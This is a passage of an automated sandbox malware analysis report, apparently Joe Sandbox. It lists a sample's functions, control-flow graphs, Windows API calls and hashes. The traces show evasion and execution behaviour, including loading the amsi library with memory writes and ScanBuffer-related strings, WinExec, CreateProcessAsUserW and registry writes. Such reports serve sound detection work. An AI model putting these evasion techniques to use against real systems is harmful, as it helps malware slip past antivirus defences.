                                                                                                                                            • API String ID: 2481178504-1225450241
                                                                                                                                            • Opcode ID: 8ef6e57ff26d1b22db9b4a2797ef229f812aff735730c7936d8b285c682f4153
                                                                                                                                            • Instruction ID: d50b737b8f9889802133aef8bc90a8d94f944258647a40365826b09e77564bd5
                                                                                                                                            • Opcode Fuzzy Hash: 8ef6e57ff26d1b22db9b4a2797ef229f812aff735730c7936d8b285c682f4153
                                                                                                                                            • Instruction Fuzzy Hash: 7B430F75A101689FDB13EBA4DDA4ADE73F6EF98304F1180E5E009A7656DE30AE81CF11
                                                                                                                                            Function 027B1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 10611 27b1724-27b1736 10612 27b1968-27b196d 10611->10612 10613 27b173c-27b174c 10611->10613 10616 27b1973-27b1984 10612->10616 10617 27b1a80-27b1a83 10612->10617 10614 27b174e-27b175b 10613->10614 10615 27b17a4-27b17ad 10613->10615 10621 27b175d-27b176a 10614->10621 10622 27b1774-27b1780 10614->10622 10615->10614 10618 27b17af-27b17bb 10615->10618 10623 27b1938-27b1945 10616->10623 10624 27b1986-27b19a2 10616->10624 10619 27b1a89-27b1a8b 10617->10619 10620 27b1684-27b16ad VirtualAlloc 10617->10620 10618->10614 10627 27b17bd-27b17c9 10618->10627 10628 27b16df-27b16e5 10620->10628 10629 27b16af-27b16dc call 27b1644 10620->10629 10630 27b176c-27b1770 10621->10630 10631 27b1794-27b17a1 10621->10631 10633 27b1782-27b1790 10622->10633 10634 27b17f0-27b17f9 10622->10634 10623->10624 10632 27b1947-27b195b Sleep 10623->10632 10625 27b19b0-27b19bf 10624->10625 10626 27b19a4-27b19ac 10624->10626 10636 27b19d8-27b19e0 10625->10636 10637 27b19c1-27b19d5 10625->10637 10635 27b1a0c-27b1a22 10626->10635 10627->10614 10638 27b17cb-27b17de Sleep 10627->10638 10629->10628 10632->10624 10642 27b195d-27b1964 Sleep 10632->10642 10639 27b17fb-27b1808 10634->10639 10640 27b182c-27b1836 10634->10640 10647 27b1a3b-27b1a47 10635->10647 10648 27b1a24-27b1a32 10635->10648 10644 27b19fc-27b19fe call 27b15cc 10636->10644 10645 27b19e2-27b19fa 10636->10645 10637->10635 10638->10614 10643 27b17e4-27b17eb Sleep 10638->10643 10639->10640 10646 27b180a-27b181e Sleep 10639->10646 10649 27b18a8-27b18b4 10640->10649 10650 27b1838-27b1863 10640->10650 10642->10623 10643->10615 10654 27b1a03-27b1a0b 10644->10654 10645->10654 10646->10640 10656 27b1820-27b1827 Sleep 10646->10656 10660 27b1a49-27b1a5c 10647->10660 10661 27b1a68 10647->10661 10648->10647 10657 27b1a34 10648->10657 10652 27b18dc-27b18eb call 27b15cc 10649->10652 10653 27b18b6-27b18c8 10649->10653 10658 27b187c-27b188a 10650->10658 10659 27b1865-27b1873 10650->10659 10670 27b18fd-27b1936 10652->10670 10674 27b18ed-27b18f7 10652->10674 10663 27b18ca 10653->10663 10664 27b18cc-27b18da 10653->10664 10656->10639 10657->10647 10667 27b18f8 10658->10667 10668 27b188c-27b18a6 call 27b1500 10658->10668 10659->10658 10666 27b1875 10659->10666 10662 27b1a6d-27b1a7f 10660->10662 10669 27b1a5e-27b1a63 call 27b1500 10660->10669 10661->10662 10663->10664 10664->10670 10666->10658 10667->10670 10668->10670 10669->10662
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,?,027B2000), ref: 027B17D0
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,027B2000), ref: 027B17E6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: c76a08a8d3c7cde21d65822eb164e636c9bf4e579673cd882a72baba69157ae0
                                                                                                                                            • Instruction ID: 7af89a056489cf8f53a59ca0993f65da4d6255b753ab2430e9f8bcd31ea0cc21
                                                                                                                                            • Opcode Fuzzy Hash: c76a08a8d3c7cde21d65822eb164e636c9bf4e579673cd882a72baba69157ae0
                                                                                                                                            • Instruction Fuzzy Hash: 6FB11576A002918FCB66CF28E4D4395BBE1FF95320F58C66AD5098B3C9CB70A451CB91
                                                                                                                                            Function 027C8704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryW.KERNEL32(amsi), ref: 027C870D
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                              • Part of subcall function 027C7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027C876C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                            • String ID: DllGetClassObject$W$amsi
                                                                                                                                            • API String ID: 941070894-2671292670
                                                                                                                                            • Opcode ID: 69c2975c11b323c5642dffbac1cbcbf6d787cbec8f1a582f9c751c479b8ae885
                                                                                                                                            • Instruction ID: bff44a2a9b06641b987374f820f7a1ef5090a829c14a72659e7e36aa5e985af6
                                                                                                                                            • Opcode Fuzzy Hash: 69c2975c11b323c5642dffbac1cbcbf6d787cbec8f1a582f9c751c479b8ae885
                                                                                                                                            • Instruction Fuzzy Hash: EAF0445054C382B9E203E6788C49F4BBFCD4B55324F148A5CB2E85A2D2DA75D1148BB7
                                                                                                                                            Function 027B1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 10699 27b1a8c-27b1a9b 10700 27b1b6c-27b1b6f 10699->10700 10701 27b1aa1-27b1aa5 10699->10701 10702 27b1c5c-27b1c60 10700->10702 10703 27b1b75-27b1b7f 10700->10703 10704 27b1b08-27b1b11 10701->10704 10705 27b1aa7-27b1aae 10701->10705 10710 27b16e8-27b170b call 27b1644 VirtualFree 10702->10710 10711 27b1c66-27b1c6b 10702->10711 10706 27b1b3c-27b1b49 10703->10706 10707 27b1b81-27b1b8d 10703->10707 10704->10705 10712 27b1b13-27b1b27 Sleep 10704->10712 10708 27b1adc-27b1ade 10705->10708 10709 27b1ab0-27b1abb 10705->10709 10706->10707 10721 27b1b4b-27b1b5f Sleep 10706->10721 10713 27b1b8f-27b1b92 10707->10713 10714 27b1bc4-27b1bd2 10707->10714 10717 27b1af3 10708->10717 10718 27b1ae0-27b1af1 10708->10718 10715 27b1abd-27b1ac2 10709->10715 10716 27b1ac4-27b1ad9 10709->10716 10730 27b170d-27b1714 10710->10730 10731 27b1716 10710->10731 10712->10705 10719 27b1b2d-27b1b38 Sleep 10712->10719 10722 27b1b96-27b1b9a 10713->10722 10714->10722 10724 27b1bd4-27b1bd9 call 27b14c0 10714->10724 10723 27b1af6-27b1b03 10717->10723 10718->10717 10718->10723 10719->10704 10721->10707 10726 27b1b61-27b1b68 Sleep 10721->10726 10727 27b1bdc-27b1be9 10722->10727 10728 27b1b9c-27b1ba2 10722->10728 10723->10703 10724->10722 10726->10706 10727->10728 10736 27b1beb-27b1bf2 call 27b14c0 10727->10736 10733 27b1bf4-27b1bfe 10728->10733 10734 27b1ba4-27b1bc2 call 27b1500 10728->10734 10732 27b1719-27b1723 10730->10732 10731->10732 10737 27b1c2c-27b1c59 call 27b1560 10733->10737 10738 27b1c00-27b1c28 VirtualFree 10733->10738 10736->10728
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,027B1FE4), ref: 027B1B17
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,027B1FE4), ref: 027B1B31
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: b8dae2bc2bb3a2dfd2068a7c7273de4f45ca1369e7183f08373a8c5254b24103
                                                                                                                                            • Instruction ID: 0b7aabe477abeeb5d86c353edc8501a2daccb61bcf56138ec4591a860eb0a3e3
                                                                                                                                            • Opcode Fuzzy Hash: b8dae2bc2bb3a2dfd2068a7c7273de4f45ca1369e7183f08373a8c5254b24103
                                                                                                                                            • Instruction Fuzzy Hash: 7051F175A012408FDB27CF6CD9E8796BBD0AF45314F9881AEE548CB2C6EB70D445CBA1
                                                                                                                                            Function 027CE72A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027CE86A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CheckConnectionInternet
                                                                                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                            • API String ID: 3847983778-3852638603
                                                                                                                                            • Opcode ID: 8294ad94de7ad5947782b97e203fec1e65b17854d4b98dcdee8297232f0c1a1a
                                                                                                                                            • Instruction ID: 8151cc8c75433ae876b43281ae0d2eb54c218342c6b500a1bce96ad4257b3702
                                                                                                                                            • Opcode Fuzzy Hash: 8294ad94de7ad5947782b97e203fec1e65b17854d4b98dcdee8297232f0c1a1a
                                                                                                                                            • Instruction Fuzzy Hash: 4E41FB75B14109AFEB13EBB4D8A6BDEB7FAEF48710F214439E041A7646DA74AD018F10
                                                                                                                                            Function 027C881C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                            • GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            • FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1543721669-0
                                                                                                                                            • Opcode ID: ba7c0317d505ec8763b404a9c69e9927b717469cc8469c9f33d96a1d60449157
                                                                                                                                            • Instruction ID: 64a6557006d855ff6c8670c9a24835f4bbae8d67dce069baafd6cc0ccef495db
                                                                                                                                            • Opcode Fuzzy Hash: ba7c0317d505ec8763b404a9c69e9927b717469cc8469c9f33d96a1d60449157
                                                                                                                                            • Instruction Fuzzy Hash: 2F11B178A40318ABEB07FBB8DC29B8E77ADEF49700F5104287B14EB2D5CA3499108F15
                                                                                                                                            Function 027C85D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027C8660
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                            • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                            • API String ID: 3130163322-2353454454
                                                                                                                                            • Opcode ID: d8f6f2ab2f230db18d0dac2354102351158b9396580d60babe23a2101f8e1ed2
                                                                                                                                            • Instruction ID: dbe6b08eb1328ce404d6db82a70916c16846be591b8aa22e6decd555b7f18cc7
                                                                                                                                            • Opcode Fuzzy Hash: d8f6f2ab2f230db18d0dac2354102351158b9396580d60babe23a2101f8e1ed2
                                                                                                                                            • Instruction Fuzzy Hash: 981115B6600248AFDB42EFA8CC55F9B37EDEB0C710F624458FA08E7291C630E9108B61
                                                                                                                                            Function 027C8406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • WinExec.KERNEL32(?,?), ref: 027C8470
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$Exec
                                                                                                                                            • String ID: Kernel32$WinExec
                                                                                                                                            • API String ID: 2292790416-3609268280
                                                                                                                                            • Opcode ID: c985a2021f86e25618f953fa269871b97f5eac9d00f49b598921652a86facb2c
                                                                                                                                            • Instruction ID: 5d79631fbf7965e4f4b4746ed68599c4faf8f73f8bb9f7f114962cbe7d7fdd36
                                                                                                                                            • Opcode Fuzzy Hash: c985a2021f86e25618f953fa269871b97f5eac9d00f49b598921652a86facb2c
                                                                                                                                            • Instruction Fuzzy Hash: 3601A479640204BFE713EFB4DC29F9A77EDEB48710F618868F900D7690D674AE108B26
                                                                                                                                            Function 027C8408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • WinExec.KERNEL32(?,?), ref: 027C8470
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$Exec
                                                                                                                                            • String ID: Kernel32$WinExec
                                                                                                                                            • API String ID: 2292790416-3609268280
                                                                                                                                            • Opcode ID: 6c617128039fd365430f38e2cd67f1801a219fab20c90414f366a08d02e2b960
                                                                                                                                            • Instruction ID: 926ccfe111369430d632e0ec56e5cc9cd27be0ff7fb83821eaf8e17e661389dc
                                                                                                                                            • Opcode Fuzzy Hash: 6c617128039fd365430f38e2cd67f1801a219fab20c90414f366a08d02e2b960
                                                                                                                                            • Instruction Fuzzy Hash: 88F0A479640204BFE713EFB4DC29F9A77EDEB48710F618868F900D7690D674AA108B26
                                                                                                                                            Function 027C5BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027C5CF4,?,?,027C3880,00000001), ref: 027C5C08
                                                                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027C5CF4,?,?,027C3880,00000001), ref: 027C5C36
                                                                                                                                              • Part of subcall function 027B7D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,027C3880,027C5C76,00000000,027C5CF4,?,?,027C3880), ref: 027B7D5E
                                                                                                                                              • Part of subcall function 027B7F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,027C3880,027C5C91,00000000,027C5CF4,?,?,027C3880,00000001), ref: 027B7F37
                                                                                                                                            • GetLastError.KERNEL32(00000000,027C5CF4,?,?,027C3880,00000001), ref: 027C5C9B
                                                                                                                                              • Part of subcall function 027BA6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,027BC359,00000000,027BC3B3), ref: 027BA717
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 503785936-0
                                                                                                                                            • Opcode ID: 2e14d54233ac52247734969c7ccc90bcf1c34d654465db823dd26cda58fc219c
                                                                                                                                            • Instruction ID: 436e84cd4ad7b85f3091d259b87662d894a24ab873ec829166510260eb625214
                                                                                                                                            • Opcode Fuzzy Hash: 2e14d54233ac52247734969c7ccc90bcf1c34d654465db823dd26cda58fc219c
                                                                                                                                            • Instruction Fuzzy Hash: 55319370A002099FDB12EFB8C8897DEBBF6AF48314F908469E904B7381D77569458FA5
                                                                                                                                            Function 027CEAF2 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,02906914), ref: 027CEB38
                                                                                                                                            • RegSetValueExA.ADVAPI32(000005DC,00000000,00000000,00000001,00000000,0000001C,00000000,027CEBA3), ref: 027CEB70
                                                                                                                                            • RegCloseKey.ADVAPI32(000005DC,000005DC,00000000,00000000,00000001,00000000,0000001C,00000000,027CEBA3), ref: 027CEB7B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 779948276-0
                                                                                                                                            • Opcode ID: d291967a615dc852c958d4d3cd38d1349741acbeb475ba9040e19ddc26c387c5
                                                                                                                                            • Instruction ID: a8266c8e7163d5433932a2546926f463308e8a1a373407f66b493a5bd84c9a65
                                                                                                                                            • Opcode Fuzzy Hash: d291967a615dc852c958d4d3cd38d1349741acbeb475ba9040e19ddc26c387c5
                                                                                                                                            • Instruction Fuzzy Hash: C411F871A04208AFEB02EFA8D8A5EAA7BEDEF09710F600464F515DB651D730DE618A64
                                                                                                                                            Function 027CEAF4 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,02906914), ref: 027CEB38
                                                                                                                                            • RegSetValueExA.ADVAPI32(000005DC,00000000,00000000,00000001,00000000,0000001C,00000000,027CEBA3), ref: 027CEB70
